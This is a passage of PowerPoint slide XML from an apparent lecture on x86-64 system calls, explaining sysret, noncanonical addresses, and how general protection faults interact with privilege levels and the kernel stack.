            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%r9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Loads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%rip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> using the value in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Changes the privilege level to Ring 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Does *not* restore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Intel defined similar instructions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>sysexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>), but later implemented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>syscall+sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> too due to their popularity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09312051-BFBF-4821-9291-4DE35B7FA23E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2851482" y="2923673"/>
            <a:ext cx="505326" cy="324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63202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0" y="-68966"/>
            <a:ext cx="12191999" cy="874128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>x86-64: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Noncanonical Addresses and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{936F41EB-52B6-4AD6-A060-4E4D8F89538D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24070" y="774151"/>
            <a:ext cx="5895477" cy="6075947"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> finds a noncanonical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, hardware raises a general protection fault (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is different than a page fault (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#PF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>PFs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> arise from errors involving page tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Ex: A protection check involving readable/writeable/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>supervisor_only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Ex: Attempt to load instruction-TLB using a non-executable PTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>#GPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> cover many kinds of errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Ex: Trying to execute a privileged instruction with ring &gt; 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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72201"/>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41087"/>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02752"/>
            <a:ext cx="1" cy="1186338"/>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27243"/>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64742"/>
            <a:ext cx="1" cy="1221004"/>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201441"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646BDBBB-911B-45C1-81B5-772180E06CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7321209" y="3271495"/>
            <a:ext cx="1" cy="1186338"/>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ACDEA80-97C3-4B86-A02D-6301D0DD6F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6288602" y="3640545"/>
            <a:ext cx="2005062" cy="400110"/>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Noncanonical</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2678962080"/>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AMD</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B6AA6E48-3374-44CE-B8E1-6BCED5C17D8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008646" y="685795"/>
            <a:ext cx="10647946" cy="3410581"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>AMD’s specification for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> wasn’t explicit about whether the check for a canonical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> should occur before or after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> changes the current privilege level!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Suppose that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Saved by OS at the beginning of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Restored by OS immediately before calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>sysret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This is what Linux and many other popular OSes do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646DAAA4-53A8-4622-AEB4-EE40458E3E52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1997238" y="4507834"/>
            <a:ext cx="2418348" cy="2331513"/>
            <a:chOff x="1997238" y="4507834"/>
            <a:chExt cx="2418348" cy="2331513"/>
          </a:xfrm>
        </p:grpSpPr>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7EC377F-656A-4D0C-A85A-72E8E8CB5CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4872792" y="4501442"/>
            <a:ext cx="6930190" cy="2337906"/>
            <a:chOff x="4872792" y="4501442"/>
            <a:chExt cx="6930190" cy="2337906"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{554EEBB1-469D-4388-B726-9F692BF1ED88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7776412"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sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Left Bracket 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1EA6FCA-E642-4618-AA91-E13B3470DBEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="8125332"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6"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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Straight Arrow Connector 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFEF4B5C-0992-47A5-84BB-720B9047A2E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6081965"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5"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6B7CF5C-613A-4CD4-8154-7D1515FF00DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4872792" y="4936193"/>
              <a:ext cx="2418348" cy="1213188"/>
              <a:chOff x="4872791" y="4936193"/>
              <a:chExt cx="2418348" cy="1213188"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="15" name="Group 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C4F192A-034B-460F-B843-E60EF222EAB3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4872791" y="4936193"/>
                <a:ext cx="2418348" cy="872902"/>
                <a:chOff x="3068051" y="4069921"/>
                <a:chExt cx="2418348" cy="872902"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="TextBox 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8362D3-A49B-4E7B-926B-76AE25B9A4F2}"/>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14" name="TextBox 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4CD50C-61A0-43A7-A8EC-F3BB241C14A0}"/>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41" name="TextBox 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A04865-6BF5-478D-B5DB-50BE1C917C7E}"/>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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1369849671"/>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AMD</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554EEBB1-469D-4388-B726-9F692BF1ED88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7776411"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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Left Bracket 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1EA6FCA-E642-4618-AA91-E13B3470DBEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8125331"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5"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FEF4B5C-0992-47A5-84BB-720B9047A2E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6081964"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4"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EA9DD8E8-BADF-4970-BFAC-AEF5C5C3926D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4872791" y="4936193"/>
            <a:ext cx="2418348" cy="1213188"/>
            <a:chOff x="4872791" y="4936193"/>
            <a:chExt cx="2418348" cy="1213188"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="Group 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C94AE437-70E4-4A99-A130-665141B96F5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4872791" y="4936193"/>
              <a:ext cx="2418348" cy="872902"/>
              <a:chOff x="3068051" y="4069921"/>
              <a:chExt cx="2418348" cy="872902"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="TextBox 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD29462-6B56-439F-A3B3-65C9A1BE7B61}"/>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36" name="TextBox 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F72DCC62-D2AC-4C70-8674-FF89428E12E4}"/>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33" name="TextBox 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFE525FC-F73F-46A1-9968-672E4F092E7A}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83811236-B263-41A4-BE48-AA01C0A75AC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="848228" y="764421"/>
            <a:ext cx="10142620" cy="3303064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> happens, the privilege level will be 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardware will switch the privilege level to 0 and perform the standard user-mode-to-kernel mode interrupt path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> point to a kernel stack mentioned by the GDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Push the old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%rip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> onto that stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%rip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the appropriate value for the interrupt handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kernel (i.e., software-level) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> handler will then execute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065E3F1C-CDA4-4040-8249-C26A0F680FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7917327" y="962916"/>
            <a:ext cx="3772010" cy="3797133"/>
            <a:chOff x="7917327" y="962916"/>
            <a:chExt cx="3772010" cy="3797133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Oval 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8AE1D0C-374B-4A82-A084-637F62C5F102}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9516979" y="4211409"/>
              <a:ext cx="548640" cy="548640"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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B1C59B-152C-4BE3-B035-40969F580D16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="7"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9985273" y="3287730"/>
              <a:ext cx="1701581" cy="1004025"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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D4CBE0-B9EC-45A0-ACAC-FB303BE80071}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7917327" y="986139"/>
              <a:ext cx="3772010" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150">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6D1AF7-1797-4144-8ED7-313C07974BE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11689337" y="962916"/>
              <a:ext cx="0" cy="2349034"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="0099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104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0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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xEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
